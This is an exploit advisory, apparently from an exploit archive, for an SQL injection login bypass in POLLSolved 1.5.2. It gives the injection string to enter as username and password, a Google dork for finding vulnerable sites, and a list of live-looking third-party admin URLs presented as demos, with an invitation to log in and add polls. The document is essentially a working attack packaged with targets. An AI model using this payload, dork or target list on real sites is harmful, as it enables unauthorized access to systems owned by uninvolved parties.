POLLSolved 1.5.2 SQL Injection Authentication Bypass Vulnerability

######################
# Exploit Title : POLLSolved Authentication Bypass
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.usolved.net/
# Google Dork : intitle:POLLSolved
# Date: 2015/11/12
# Version : v1.5.2
#
######################
# PoC:
#To bypass the login page enter '=' 'or' for username and password input.
#Login And Add Your Poll D:
#
#
#Demo:
#http://kleckserupload.squXare7.ch/pollsolved/admin.php
#http://www.swissfleckviXeh.ch/Umfrage/admin.php
#http://www.harzerpanXorama.de/pool/admin.php
#http://schlagerheilo.Xde/pollsolved/admin.php
#http://www.ccbsayXit.com/pollsolved/admin.php
#http://www.woodXforsims.de/Upoll/admin.php
#www.smital.at/poll/admin.php
#
#
#And Replace Admin.php With Poll.php
######################
# discovered by :
# Mojtaba MobhaM ([email protected])
# T3NZOG4N ([email protected])
######################

#  0day.today [2018-03-06]  #